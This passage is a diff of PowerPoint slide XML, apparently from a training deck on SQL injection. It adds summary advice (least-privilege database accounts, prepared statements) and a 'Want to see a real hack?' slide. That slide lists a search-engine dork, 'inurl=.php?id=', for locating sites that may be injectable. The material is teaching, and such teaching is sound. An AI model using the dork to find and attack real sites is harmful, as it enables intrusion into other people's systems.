-            <a:endParaRPr lang="en-US" dirty="0">
+              <a:t>SQL </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>server </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" b="1" i="1" dirty="0" smtClean="0">
+                <a:solidFill>
+                  <a:srgbClr val="FF0000"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>separately</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
               <a:solidFill>
                 <a:schemeClr val="tx1"/>
               </a:solidFill>
@@ -15518,7 +15705,7 @@
     </p:spTree>
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
-        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1310789644"/>
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="848504790"/>
       </p:ext>
     </p:extLst>
   </p:cSld>
@@ -15841,7 +16028,7 @@
                 <a:latin typeface="Constantia"/>
                 <a:cs typeface="Constantia"/>
               </a:rPr>
-              <a:t>Demo</a:t>
+              <a:t>Summary</a:t>
             </a:r>
             <a:endParaRPr lang="en-US" sz="4000" dirty="0">
               <a:latin typeface="Constantia"/>
@@ -16056,26 +16243,72 @@
               <a:buChar char="•"/>
             </a:pPr>
             <a:r>
-              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0">
-                <a:solidFill>
-                  <a:schemeClr val="tx1"/>
-                </a:solidFill>
-                <a:hlinkClick r:id="rId3"/>
-              </a:rPr>
-              <a:t>Index.php</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-US" i="1" dirty="0" smtClean="0">
+              <a:rPr lang="en-US" dirty="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>Never connect to </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>database as super user =&gt; limited privileges</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="342900" indent="-342900" algn="l">
+              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
+              <a:buChar char="•"/>
+            </a:pPr>
+            <a:endParaRPr lang="en-US" dirty="0">
               <a:solidFill>
                 <a:schemeClr val="tx1"/>
               </a:solidFill>
             </a:endParaRPr>
           </a:p>
+          <a:p>
+            <a:pPr marL="342900" indent="-342900" algn="l">
+              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
+              <a:buChar char="•"/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>Use prepared statements with bound </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>variables</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="342900" indent="-342900" algn="l">
+              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
+              <a:buChar char="•"/>
+            </a:pPr>
+            <a:endParaRPr lang="en-US" dirty="0">
+              <a:solidFill>
+                <a:schemeClr val="tx1"/>
+              </a:solidFill>
+            </a:endParaRPr>
+          </a:p>
         </p:txBody>
       </p:sp>
     </p:spTree>
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
-        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="167973777"/>
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1310789644"/>
       </p:ext>
     </p:extLst>
   </p:cSld>
@@ -17406,7 +17639,7 @@
                 </a:solidFill>
                 <a:hlinkClick r:id="rId3"/>
               </a:rPr>
-              <a:t>Index2.php</a:t>
+              <a:t>Index.php</a:t>
             </a:r>
             <a:endParaRPr lang="en-US" i="1" dirty="0" smtClean="0">
               <a:solidFill>
@@ -17419,7 +17652,7 @@
     </p:spTree>
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
-        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3334160463"/>
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="167973777"/>
       </p:ext>
     </p:extLst>
   </p:cSld>
@@ -17963,7 +18196,7 @@
                 </a:solidFill>
                 <a:hlinkClick r:id="rId3"/>
               </a:rPr>
-              <a:t>Index3.php</a:t>
+              <a:t>Index2.php</a:t>
             </a:r>
             <a:endParaRPr lang="en-US" i="1" dirty="0" smtClean="0">
               <a:solidFill>
@@ -17976,7 +18209,7 @@
     </p:spTree>
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
-        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3796370955"/>
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3334160463"/>
       </p:ext>
     </p:extLst>
   </p:cSld>
@@ -18299,21 +18532,7 @@
                 <a:latin typeface="Constantia"/>
                 <a:cs typeface="Constantia"/>
               </a:rPr>
-              <a:t>Want to see </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="4000" smtClean="0">
-                <a:latin typeface="Constantia"/>
-                <a:cs typeface="Constantia"/>
-              </a:rPr>
-              <a:t>real hack</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="4000" dirty="0" smtClean="0">
-                <a:latin typeface="Constantia"/>
-                <a:cs typeface="Constantia"/>
-              </a:rPr>
-              <a:t>?</a:t>
+              <a:t>Demo</a:t>
             </a:r>
             <a:endParaRPr lang="en-US" sz="4000" dirty="0">
               <a:latin typeface="Constantia"/>
@@ -18547,7 +18766,7 @@
     </p:spTree>
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
-        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1148958190"/>
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3796370955"/>
       </p:ext>
     </p:extLst>
   </p:cSld>
@@ -18595,6 +18814,599 @@
       </p:grpSpPr>
       <p:sp>
         <p:nvSpPr>
+          <p:cNvPr id="3" name="Date Placeholder 2"/>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="dt" sz="half" idx="10"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="0" y="6530996"/>
+            <a:ext cx="2133600" cy="365125"/>
+          </a:xfrm>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:fld id="{945310C2-C0B2-5241-BEC0-6819B2B3C035}" type="datetime2">
+              <a:rPr lang="en-US" smtClean="0">
+                <a:solidFill>
+                  <a:srgbClr val="FFFFFF"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:pPr/>
+              <a:t>Tuesday, April 28, 2015</a:t>
+            </a:fld>
+            <a:endParaRPr lang="en-US" dirty="0">
+              <a:solidFill>
+                <a:srgbClr val="FFFFFF"/>
+              </a:solidFill>
+            </a:endParaRPr>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="4" name="Footer Placeholder 3"/>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="ftr" sz="quarter" idx="11"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="3124200" y="6530996"/>
+            <a:ext cx="2895600" cy="365125"/>
+          </a:xfrm>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr algn="l"/>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="bg1"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>www.qsoftvietnam.com</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" dirty="0">
+              <a:solidFill>
+                <a:schemeClr val="bg1"/>
+              </a:solidFill>
+            </a:endParaRPr>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="5" name="Slide Number Placeholder 4"/>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="sldNum" sz="quarter" idx="12"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="6853962" y="6530996"/>
+            <a:ext cx="2133600" cy="365125"/>
+          </a:xfrm>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:fld id="{FA84A37A-AFC2-4A01-80A1-FC20F2C0D5BB}" type="slidenum">
+              <a:rPr lang="en-US" smtClean="0">
+                <a:solidFill>
+                  <a:srgbClr val="FFFFFF"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:pPr/>
+              <a:t>23</a:t>
+            </a:fld>
+            <a:endParaRPr lang="en-US" dirty="0">
+              <a:solidFill>
+                <a:srgbClr val="FFFFFF"/>
+              </a:solidFill>
+            </a:endParaRPr>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="7" name="Title 1"/>
+          <p:cNvSpPr txBox="1">
+            <a:spLocks/>
+          </p:cNvSpPr>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr bwMode="auto">
+          <a:xfrm>
+            <a:off x="125944" y="1018034"/>
+            <a:ext cx="8720218" cy="1143000"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+          <a:ln w="9525">
+            <a:noFill/>
+            <a:miter lim="800000"/>
+            <a:headEnd/>
+            <a:tailEnd/>
+          </a:ln>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr vert="horz" wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" numCol="1" anchor="ctr" anchorCtr="0" compatLnSpc="1">
+            <a:prstTxWarp prst="textNoShape">
+              <a:avLst/>
+            </a:prstTxWarp>
+          </a:bodyPr>
+          <a:lstStyle>
+            <a:lvl1pPr algn="ctr" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
+              <a:spcBef>
+                <a:spcPct val="0"/>
+              </a:spcBef>
+              <a:spcAft>
+                <a:spcPct val="0"/>
+              </a:spcAft>
+              <a:defRPr sz="4400" kern="1200">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:latin typeface="+mj-lt"/>
+                <a:ea typeface="+mj-ea"/>
+                <a:cs typeface="+mj-cs"/>
+              </a:defRPr>
+            </a:lvl1pPr>
+            <a:lvl2pPr algn="ctr" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
+              <a:spcBef>
+                <a:spcPct val="0"/>
+              </a:spcBef>
+              <a:spcAft>
+                <a:spcPct val="0"/>
+              </a:spcAft>
+              <a:defRPr sz="4400">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:latin typeface="Arial" charset="0"/>
+              </a:defRPr>
+            </a:lvl2pPr>
+            <a:lvl3pPr algn="ctr" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
+              <a:spcBef>
+                <a:spcPct val="0"/>
+              </a:spcBef>
+              <a:spcAft>
+                <a:spcPct val="0"/>
+              </a:spcAft>
+              <a:defRPr sz="4400">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:latin typeface="Arial" charset="0"/>
+              </a:defRPr>
+            </a:lvl3pPr>
+            <a:lvl4pPr algn="ctr" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
+              <a:spcBef>
+                <a:spcPct val="0"/>
+              </a:spcBef>
+              <a:spcAft>
+                <a:spcPct val="0"/>
+              </a:spcAft>
+              <a:defRPr sz="4400">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:latin typeface="Arial" charset="0"/>
+              </a:defRPr>
+            </a:lvl4pPr>
+            <a:lvl5pPr algn="ctr" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
+              <a:spcBef>
+                <a:spcPct val="0"/>
+              </a:spcBef>
+              <a:spcAft>
+                <a:spcPct val="0"/>
+              </a:spcAft>
+              <a:defRPr sz="4400">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:latin typeface="Arial" charset="0"/>
+              </a:defRPr>
+            </a:lvl5pPr>
+            <a:lvl6pPr marL="457200" algn="ctr" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
+              <a:spcBef>
+                <a:spcPct val="0"/>
+              </a:spcBef>
+              <a:spcAft>
+                <a:spcPct val="0"/>
+              </a:spcAft>
+              <a:defRPr sz="4400">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:latin typeface="Lucida Sans" pitchFamily="34" charset="0"/>
+              </a:defRPr>
+            </a:lvl6pPr>
+            <a:lvl7pPr marL="914400" algn="ctr" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
+              <a:spcBef>
+                <a:spcPct val="0"/>
+              </a:spcBef>
+              <a:spcAft>
+                <a:spcPct val="0"/>
+              </a:spcAft>
+              <a:defRPr sz="4400">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:latin typeface="Lucida Sans" pitchFamily="34" charset="0"/>
+              </a:defRPr>
+            </a:lvl7pPr>
+            <a:lvl8pPr marL="1371600" algn="ctr" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
+              <a:spcBef>
+                <a:spcPct val="0"/>
+              </a:spcBef>
+              <a:spcAft>
+                <a:spcPct val="0"/>
+              </a:spcAft>
+              <a:defRPr sz="4400">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:latin typeface="Lucida Sans" pitchFamily="34" charset="0"/>
+              </a:defRPr>
+            </a:lvl8pPr>
+            <a:lvl9pPr marL="1828800" algn="ctr" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
+              <a:spcBef>
+                <a:spcPct val="0"/>
+              </a:spcBef>
+              <a:spcAft>
+                <a:spcPct val="0"/>
+              </a:spcAft>
+              <a:defRPr sz="4400">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:latin typeface="Lucida Sans" pitchFamily="34" charset="0"/>
+              </a:defRPr>
+            </a:lvl9pPr>
+          </a:lstStyle>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" sz="4000" dirty="0" smtClean="0">
+                <a:latin typeface="Constantia"/>
+                <a:cs typeface="Constantia"/>
+              </a:rPr>
+              <a:t>Want to see a </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="4000" dirty="0" smtClean="0">
+                <a:latin typeface="Constantia"/>
+                <a:cs typeface="Constantia"/>
+              </a:rPr>
+              <a:t>real hack?</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" sz="4000" dirty="0">
+              <a:latin typeface="Constantia"/>
+              <a:cs typeface="Constantia"/>
+            </a:endParaRPr>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="9" name="Content Placeholder 2"/>
+          <p:cNvSpPr txBox="1">
+            <a:spLocks/>
+          </p:cNvSpPr>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr bwMode="auto">
+          <a:xfrm>
+            <a:off x="457200" y="2547533"/>
+            <a:ext cx="8229600" cy="3361133"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+          <a:ln w="9525">
+            <a:noFill/>
+            <a:miter lim="800000"/>
+            <a:headEnd/>
+            <a:tailEnd/>
+          </a:ln>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr vert="horz" wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" numCol="1" anchor="t" anchorCtr="0" compatLnSpc="1">
+            <a:prstTxWarp prst="textNoShape">
+              <a:avLst/>
+            </a:prstTxWarp>
+          </a:bodyPr>
+          <a:lstStyle>
+            <a:lvl1pPr marL="0" indent="0" algn="ctr" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
+              <a:spcBef>
+                <a:spcPct val="20000"/>
+              </a:spcBef>
+              <a:spcAft>
+                <a:spcPct val="0"/>
+              </a:spcAft>
+              <a:buFont typeface="Arial" charset="0"/>
+              <a:buNone/>
+              <a:defRPr sz="2400" kern="1200">
+                <a:solidFill>
+                  <a:schemeClr val="tx1">
+                    <a:tint val="75000"/>
+                  </a:schemeClr>
+                </a:solidFill>
+                <a:latin typeface="+mn-lt"/>
+                <a:ea typeface="+mn-ea"/>
+                <a:cs typeface="+mn-cs"/>
+              </a:defRPr>
+            </a:lvl1pPr>
+            <a:lvl2pPr marL="457200" indent="0" algn="ctr" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
+              <a:spcBef>
+                <a:spcPct val="20000"/>
+              </a:spcBef>
+              <a:spcAft>
+                <a:spcPct val="0"/>
+              </a:spcAft>
+              <a:buFont typeface="Arial" charset="0"/>
+              <a:buNone/>
+              <a:defRPr sz="2000" kern="1200">
+                <a:solidFill>
+                  <a:schemeClr val="tx1">
+                    <a:tint val="75000"/>
+                  </a:schemeClr>
+                </a:solidFill>
+                <a:latin typeface="+mn-lt"/>
+                <a:ea typeface="+mn-ea"/>
+                <a:cs typeface="+mn-cs"/>
+              </a:defRPr>
+            </a:lvl2pPr>
+            <a:lvl3pPr marL="914400" indent="0" algn="ctr" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
+              <a:spcBef>
+                <a:spcPct val="20000"/>
+              </a:spcBef>
+              <a:spcAft>
+                <a:spcPct val="0"/>
+              </a:spcAft>
+              <a:buFont typeface="Arial" charset="0"/>
+              <a:buNone/>
+              <a:defRPr kern="1200">
+                <a:solidFill>
+                  <a:schemeClr val="tx1">
+                    <a:tint val="75000"/>
+                  </a:schemeClr>
+                </a:solidFill>
+                <a:latin typeface="+mn-lt"/>
+                <a:ea typeface="+mn-ea"/>
+                <a:cs typeface="+mn-cs"/>
+              </a:defRPr>
+            </a:lvl3pPr>
+            <a:lvl4pPr marL="1371600" indent="0" algn="ctr" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
+              <a:spcBef>
+                <a:spcPct val="20000"/>
+              </a:spcBef>
+              <a:spcAft>
+                <a:spcPct val="0"/>
+              </a:spcAft>
+              <a:buFont typeface="Arial" charset="0"/>
+              <a:buNone/>
+              <a:defRPr sz="1600" kern="1200">
+                <a:solidFill>
+                  <a:schemeClr val="tx1">
+                    <a:tint val="75000"/>
+                  </a:schemeClr>
+                </a:solidFill>
+                <a:latin typeface="+mn-lt"/>
+                <a:ea typeface="+mn-ea"/>
+                <a:cs typeface="+mn-cs"/>
+              </a:defRPr>
+            </a:lvl4pPr>
+            <a:lvl5pPr marL="1828800" indent="0" algn="ctr" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
+              <a:spcBef>
+                <a:spcPct val="20000"/>
+              </a:spcBef>
+              <a:spcAft>
+                <a:spcPct val="0"/>
+              </a:spcAft>
+              <a:buFont typeface="Arial" charset="0"/>
+              <a:buNone/>
+              <a:defRPr sz="1600" kern="1200">
+                <a:solidFill>
+                  <a:schemeClr val="tx1">
+                    <a:tint val="75000"/>
+                  </a:schemeClr>
+                </a:solidFill>
+                <a:latin typeface="+mn-lt"/>
+                <a:ea typeface="+mn-ea"/>
+                <a:cs typeface="+mn-cs"/>
+              </a:defRPr>
+            </a:lvl5pPr>
+            <a:lvl6pPr marL="2286000" indent="0" algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
+              <a:spcBef>
+                <a:spcPct val="20000"/>
+              </a:spcBef>
+              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
+              <a:buNone/>
+              <a:defRPr sz="2000" kern="1200">
+                <a:solidFill>
+                  <a:schemeClr val="tx1">
+                    <a:tint val="75000"/>
+                  </a:schemeClr>
+                </a:solidFill>
+                <a:latin typeface="+mn-lt"/>
+                <a:ea typeface="+mn-ea"/>
+                <a:cs typeface="+mn-cs"/>
+              </a:defRPr>
+            </a:lvl6pPr>
+            <a:lvl7pPr marL="2743200" indent="0" algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
+              <a:spcBef>
+                <a:spcPct val="20000"/>
+              </a:spcBef>
+              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
+              <a:buNone/>
+              <a:defRPr sz="2000" kern="1200">
+                <a:solidFill>
+                  <a:schemeClr val="tx1">
+                    <a:tint val="75000"/>
+                  </a:schemeClr>
+                </a:solidFill>
+                <a:latin typeface="+mn-lt"/>
+                <a:ea typeface="+mn-ea"/>
+                <a:cs typeface="+mn-cs"/>
+              </a:defRPr>
+            </a:lvl7pPr>
+            <a:lvl8pPr marL="3200400" indent="0" algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
+              <a:spcBef>
+                <a:spcPct val="20000"/>
+              </a:spcBef>
+              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
+              <a:buNone/>
+              <a:defRPr sz="2000" kern="1200">
+                <a:solidFill>
+                  <a:schemeClr val="tx1">
+                    <a:tint val="75000"/>
+                  </a:schemeClr>
+                </a:solidFill>
+                <a:latin typeface="+mn-lt"/>
+                <a:ea typeface="+mn-ea"/>
+                <a:cs typeface="+mn-cs"/>
+              </a:defRPr>
+            </a:lvl8pPr>
+            <a:lvl9pPr marL="3657600" indent="0" algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
+              <a:spcBef>
+                <a:spcPct val="20000"/>
+              </a:spcBef>
+              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
+              <a:buNone/>
+              <a:defRPr sz="2000" kern="1200">
+                <a:solidFill>
+                  <a:schemeClr val="tx1">
+                    <a:tint val="75000"/>
+                  </a:schemeClr>
+                </a:solidFill>
+                <a:latin typeface="+mn-lt"/>
+                <a:ea typeface="+mn-ea"/>
+                <a:cs typeface="+mn-cs"/>
+              </a:defRPr>
+            </a:lvl9pPr>
+          </a:lstStyle>
+          <a:p>
+            <a:pPr marL="342900" indent="-342900" algn="l">
+              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
+              <a:buChar char="•"/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" i="1" dirty="0" err="1">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>inurl</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" i="1" dirty="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>=.</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" i="1" dirty="0" err="1">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>php?id</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" i="1" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>=</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="342900" indent="-342900" algn="l">
+              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
+              <a:buChar char="•"/>
+            </a:pPr>
+            <a:endParaRPr lang="en-US" i="1" dirty="0" smtClean="0">
+              <a:solidFill>
+                <a:schemeClr val="tx1"/>
+              </a:solidFill>
+            </a:endParaRPr>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+    </p:spTree>
+    <p:extLst>
+      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1148958190"/>
+      </p:ext>
+    </p:extLst>
+  </p:cSld>
+  <p:clrMapOvr>
+    <a:masterClrMapping/>
+  </p:clrMapOvr>
+  <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main">
+    <mc:Choice Requires="p14">
+      <p:transition p14:dur="100">
+        <p:cut/>
+      </p:transition>
+    </mc:Choice>
+    <mc:Fallback xmlns="">
+      <p:transition>
+        <p:cut/>
+      </p:transition>
+    </mc:Fallback>
+  </mc:AlternateContent>
+  <p:timing>
+    <p:tnLst>
+      <p:par>
+        <p:cTn id="1" dur="indefinite" restart="never" nodeType="tmRoot"/>
+      </p:par>
+    </p:tnLst>
+  </p:timing>
+</p:sld>
+</file>
+
+<file path=ppt/slides/slide24.xml><?xml version="1.0" encoding="utf-8"?>
+<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
+  <p:cSld>
+    <p:spTree>
+      <p:nvGrpSpPr>
+        <p:cNvPr id="1" name=""/>
+        <p:cNvGrpSpPr/>
+        <p:nvPr/>
+      </p:nvGrpSpPr>
+      <p:grpSpPr>
+        <a:xfrm>
+          <a:off x="0" y="0"/>
+          <a:ext cx="0" cy="0"/>
+          <a:chOff x="0" y="0"/>
+          <a:chExt cx="0" cy="0"/>
+        </a:xfrm>
+      </p:grpSpPr>
+      <p:sp>
+        <p:nvSpPr>
           <p:cNvPr id="2" name="Title 1"/>
           <p:cNvSpPr>
             <a:spLocks noGrp="1"/>
@@ -18736,7 +19548,7 @@
                 </a:solidFill>
               </a:rPr>
               <a:pPr/>
-              <a:t>23</a:t>
+              <a:t>24</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US" dirty="0">
               <a:solidFill>
@@ -22828,7 +23640,15 @@
                   <a:schemeClr val="tx1"/>
                 </a:solidFill>
               </a:rPr>
-              <a:t>SQL parameters</a:t>
+              <a:t>SQL </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>parameters &amp; prepared statements</a:t>
             </a:r>
             <a:endParaRPr lang="en-US" i="1" dirty="0" smtClean="0">
               <a:solidFill>

--- a/QSoftVietnam_SlideTemplate2014- Sonvq.pptx
+++ b/QSoftVietnam_SlideTemplate2014- Sonvq.pptx
@@ -4548,33 +4548,522 @@
               <a:defRPr/>
             </a:pPr>
             <a:r>
-              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
-                <a:solidFill>
-                  <a:schemeClr val="tx1"/>
-                </a:solidFill>
-                <a:effectLst/>
-                <a:latin typeface="+mn-lt"/>
-                <a:ea typeface="+mn-ea"/>
-                <a:cs typeface="+mn-cs"/>
-              </a:rPr>
-              <a:t>Login normal: </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" i="0" dirty="0" smtClean="0">
-                <a:solidFill>
-                  <a:schemeClr val="tx1"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>quangsonpro</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" i="0" smtClean="0">
-                <a:solidFill>
-                  <a:schemeClr val="tx1"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>, langtutuoiteen</a:t>
-            </a:r>
+              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>1. </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" i="1" dirty="0" err="1" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>inurl</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>=.</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" i="1" dirty="0" err="1" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>php?id</a:t>
+            </a:r>
+            <a:r>
